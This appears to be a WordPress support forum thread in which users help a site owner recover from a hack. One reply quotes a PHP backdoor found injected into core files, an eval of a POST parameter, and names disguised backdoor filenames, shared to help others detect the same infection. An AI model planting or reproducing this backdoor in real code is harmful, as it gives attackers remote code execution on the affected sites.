Thread Starter
robfaich
(@robinfaichney)
Thanks very much WPyogi. Files index.php and wp-blog-header.php (at least) had been modified so I changed the admin password and reinstalled WP. I’m now looking at what else I should do.
You really need to go through all the articles above – just removing the code may not close any “backdoors” and the hack may well be repeated. Unfortunately, there’s not a quick-fix for hacked sites.
This newish article that may also be useful in avoiding future hacking:
http://codex.wordpress.org/Brute_Force_Attacks
Thread Starter
robfaich
(@robinfaichney)
Thanks again, it tests clean now so I feel I can postpone further actions to tomorrow but I’ll do a proper job then.
Robin we had some similar strange behavior on a client’s site last week and it appears the hackers were somehow able to inject PHP code through a contact form. They had hundreds of strange contact form submissions that on first appearance looked like spam but what you didn’t see was the hidden code being injected somehow. This piece of code was added to a bunch of standard WP working files.
if (isset($_POST['wp-load'])) {
eval($_POST['wp-load']);
};
This code above could be the chicken and the egg problem. Not sure if the code above allows the contact form to be used as an attack vector or the contact form was used first to inject this code. I believe the CAPTCHA was also being completely bypassed.
We also found backdoor shell scripts in folders downstream of /wp-includes/js/. I would look through all of these folders for any PHP files that are unique and not part of your normal wordpress installation.
These files below were that were added that look like they should be WP files but were unique files not part of the normal WP installation.
wp-apps.php
wp-count.php
wp-var.php
Good luck.
Thread Starter
robfaich
(@robinfaichney)
Hi slickrockweb, thanks a lot for taking this trouble. I used FileZilla to do a search on those filenames, which were not found. I’m doing a Sucuri SiteCheck every few hours. I’ve decided if that finds anything I’ll wipe the site clean and start from scratch (following http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/), otherwise I’m keeping my fingers crossed.
Rob